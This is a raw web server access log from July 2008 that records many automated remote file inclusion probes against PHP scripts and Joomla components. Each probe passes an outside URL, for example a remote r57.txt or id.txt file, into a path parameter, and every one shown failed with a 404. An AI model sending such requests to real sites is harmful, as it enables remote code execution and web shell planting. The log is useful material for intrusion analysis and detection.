90.3.115.62 - - [31/Jul/2008:05:27:13 -0500] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
218.38.54.160 - - [31/Jul/2008:05:28:02 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
218.38.54.160 - - [31/Jul/2008:05:28:02 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
218.38.54.160 - - [31/Jul/2008:05:28:03 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
70.84.182.98 - - [31/Jul/2008:05:28:29 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:28:29 -0500] "GET /lostpasswd.php?env[include_prefix]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:28:29 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:28:30 -0500] "GET /lostpasswd.php?env[include_prefix]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.53.89.162 - - [31/Jul/2008:05:28:39 -0500] "GET /logs/access_log.1213142400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:05:29:00 -0500] "GET /logs/access_log.1213315200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
62.152.41.170 - - [31/Jul/2008:05:31:00 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
62.152.41.170 - - [31/Jul/2008:05:31:00 -0500] "GET //include/admin.lib.inc.php?site_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
92.56.99.197 - - [31/Jul/2008:05:31:49 -0500] "GET /logs/access_log.1213142400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
92.56.99.197 - - [31/Jul/2008:05:32:03 -0500] "GET /logs/access_log.1213315200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
70.84.182.98 - - [31/Jul/2008:05:32:04 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:32:04 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
209.25.195.86 - - [31/Jul/2008:05:32:06 -0500] "GET /logs/access_log.1213142400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 370 "-""libwww-perl/5.811"
70.84.182.98 - - [31/Jul/2008:05:32:07 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:32:07 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
209.25.195.86 - - [31/Jul/2008:05:32:23 -0500] "GET /logs/access_log.1213315200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 370 "-""libwww-perl/5.811"
74.6.18.231 - - [31/Jul/2008:05:34:55 -0500] "GET /logs/access_log.1179360000 HTTP/1.0" 200 140975 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.89.162 - - [31/Jul/2008:05:36:02 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 307 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.53.89.162 - - [31/Jul/2008:05:36:02 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 302 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.53.89.162 - - [31/Jul/2008:05:36:02 -0500] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 329 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
209.25.195.86 - - [31/Jul/2008:05:37:27 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.811"
209.25.195.86 - - [31/Jul/2008:05:37:27 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
89.186.1.54 - - [31/Jul/2008:05:38:38 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.800"
89.186.1.54 - - [31/Jul/2008:05:38:38 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.800"
89.186.1.54 - - [31/Jul/2008:05:38:38 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 358 "-""libwww-perl/5.800"
201.130.79.132 - - [31/Jul/2008:05:38:49 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:38:49 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:38:52 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:38:53 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:39:47 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:39:47 -0500] "GET /logs/access_log.1214092800//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:39:47 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:39:52 -0500] "GET /logs/access_log.1215993600//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
87.118.98.3 - - [31/Jul/2008:05:40:10 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.118.98.3 - - [31/Jul/2008:05:40:10 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
74.53.89.162 - - [31/Jul/2008:05:41:15 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:05:41:15 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
89.186.1.54 - - [31/Jul/2008:05:42:20 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
89.186.1.54 - - [31/Jul/2008:05:42:20 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
201.130.79.132 - - [31/Jul/2008:05:42:45 -0500] "GET /logs/access_log.1214092800//PhpLinkExchange/bits_listings.php?svr_rootP=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:42:45 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:42:45 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:42:52 -0500] "GET /logs/access_log.1215993600//PhpLinkExchange/bits_listings.php?svr_rootP=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
75.0.18.81 - - [31/Jul/2008:05:43:08 -0500] "GET /logs/access_log.1213142400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
75.0.18.81 - - [31/Jul/2008:05:43:32 -0500] "GET /logs/access_log.1213315200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
87.118.98.3 - - [31/Jul/2008:05:43:46 -0500] "GET /logs/access_log.1214092800//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
87.118.98.3 - - [31/Jul/2008:05:43:46 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
87.118.98.3 - - [31/Jul/2008:05:43:46 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
62.75.240.22 - - [31/Jul/2008:05:43:46 -0500] "GET /logs/access_log.1214438400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
62.75.240.22 - - [31/Jul/2008:05:43:47 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
62.75.240.22 - - [31/Jul/2008:05:43:47 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
87.118.98.3 - - [31/Jul/2008:05:43:59 -0500] "GET /logs/access_log.1215993600//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
153.19.161.46 - - [31/Jul/2008:05:44:10 -0500] "GET /logs/index.php?dept=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:44:10 -0500] "GET /logs/index.php?dept=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:44:10 -0500] "GET /index.php?dept=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:44:10 -0500] "GET /index.php?dept=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.206.113.104 - - [31/Jul/2008:05:44:20 -0500] "GET /logs/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.206.113.104 - - [31/Jul/2008:05:44:20 -0500] "GET /errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.53.89.162 - - [31/Jul/2008:05:44:41 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:05:44:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:05:45:01 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
74.54.108.98 - - [31/Jul/2008:05:46:00 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:46:00 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:46:05 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:46:05 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
209.25.195.86 - - [31/Jul/2008:05:46:28 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
89.186.1.54 - - [31/Jul/2008:05:46:33 -0500] "GET /phphtml.php?htmlclass_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.800"
89.186.1.54 - - [31/Jul/2008:05:46:33 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.800"
89.186.1.54 - - [31/Jul/2008:05:46:44 -0500] "GET /logs/phphtml.php?htmlclass_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
201.130.79.132 - - [31/Jul/2008:05:47:32 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://geo.ya.com/v3g3t4/cc/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.130.79.132 - - [31/Jul/2008:05:47:32 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://geo.ya.com/v3g3t4/cc/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
80.67.26.157 - - [31/Jul/2008:05:48:12 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:05:48:12 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:05:48:12 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.808"
218.38.54.160 - - [31/Jul/2008:05:48:50 -0500] "GET /logs/access_log.1213142400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
213.193.229.20 - - [31/Jul/2008:05:48:50 -0500] "GET /logs/access_log.1213315200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.803"
213.193.229.20 - - [31/Jul/2008:05:48:50 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
213.193.229.20 - - [31/Jul/2008:05:48:51 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
218.38.54.160 - - [31/Jul/2008:05:48:53 -0500] "GET /logs/access_log.1213315200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
213.193.229.20 - - [31/Jul/2008:05:49:32 -0500] "GET /logs/access_log.1213142400%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 375 "-""libwww-perl/5.803"
69.65.33.36 - - [31/Jul/2008:05:49:42 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fallauna.com/coprald/uid.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
69.65.33.36 - - [31/Jul/2008:05:49:42 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fallauna.com/coprald/uid.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
86.57.255.65 - - [31/Jul/2008:05:50:53 -0500] "GET /logs/access_log.1213142400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
86.57.255.65 - - [31/Jul/2008:05:50:53 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
86.57.255.65 - - [31/Jul/2008:05:50:53 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
86.57.255.65 - - [31/Jul/2008:05:51:18 -0500] "GET /logs/access_log.1213747200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
86.57.255.65 - - [31/Jul/2008:05:52:34 -0500] "GET /logs/access_log.1212278400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
70.84.182.98 - - [31/Jul/2008:05:52:45 -0500] "GET /logs//errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:52:45 -0500] "GET /logs//errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:52:45 -0500] "GET //errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:52:45 -0500] "GET //errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
153.19.161.46 - - [31/Jul/2008:05:53:12 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:53:12 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:53:14 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:53:14 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
86.57.255.65 - - [31/Jul/2008:05:53:52 -0500] "GET /logs/access_log.1212624000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
86.57.255.65 - - [31/Jul/2008:05:53:53 -0500] "GET /logs/access_log.1214784000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
92.56.99.197 - - [31/Jul/2008:05:54:06 -0500] "GET /logs/access_log.1216598400//e404.php?DOCUMENT_ROOT=http://keycell.webs/IDscan.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
92.56.99.197 - - [31/Jul/2008:05:54:06 -0500] "GET //e404.php?DOCUMENT_ROOT=http://keycell.webs/IDscan.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
92.56.99.197 - - [31/Jul/2008:05:54:06 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://keycell.webs/IDscan.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
86.57.255.65 - - [31/Jul/2008:05:54:18 -0500] "GET /logs/access_log.1213315200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
86.57.255.65 - - [31/Jul/2008:05:54:18 -0500] "GET /logs/access_log.1216252800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
208.75.225.10 - - [31/Jul/2008:05:54:40 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://ahoic.com/logo/id4.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
208.75.225.10 - - [31/Jul/2008:05:54:40 -0500] "GET //e404.php?DOCUMENT_ROOT=http://ahoic.com/logo/id4.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
209.25.195.86 - - [31/Jul/2008:05:55:40 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
209.25.195.86 - - [31/Jul/2008:05:55:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
80.67.26.157 - - [31/Jul/2008:05:57:01 -0500] "GET /logs/access_log.1213142400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.808"
211.93.112.42 - - [31/Jul/2008:05:57:13 -0500] "GET /logs/access_log.1213315200//errors.php?error=http://www.kelserific4.xpg.com.br/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
211.93.112.42 - - [31/Jul/2008:05:57:15 -0500] "GET //errors.php?error=http://www.kelserific4.xpg.com.br/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
211.93.112.42 - - [31/Jul/2008:05:57:16 -0500] "GET /logs//errors.php?error=http://www.kelserific4.xpg.com.br/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
80.67.26.157 - - [31/Jul/2008:05:57:22 -0500] "GET /logs/access_log.1213315200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.808"
195.93.201.102 - - [31/Jul/2008:05:57:54 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:05:57:54 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:05:57:54 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
92.56.99.197 - - [31/Jul/2008:05:58:02 -0500] "GET /logs/access_log.1216598400//e404.php?DOCUMENT_ROOT=http://keycell.webs/IDscan.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
92.56.99.197 - - [31/Jul/2008:05:58:02 -0500] "GET //e404.php?DOCUMENT_ROOT=http://keycell.webs/IDscan.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
92.56.99.197 - - [31/Jul/2008:05:58:07 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://keycell.webs/IDscan.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
92.56.99.197 - - [31/Jul/2008:05:58:56 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://keycell.webs/IDscan.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
92.56.99.197 - - [31/Jul/2008:05:58:56 -0500] "GET /logs/access_log.1216598400//e404.php?DOCUMENT_ROOT=http://keycell.webs/IDscan.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
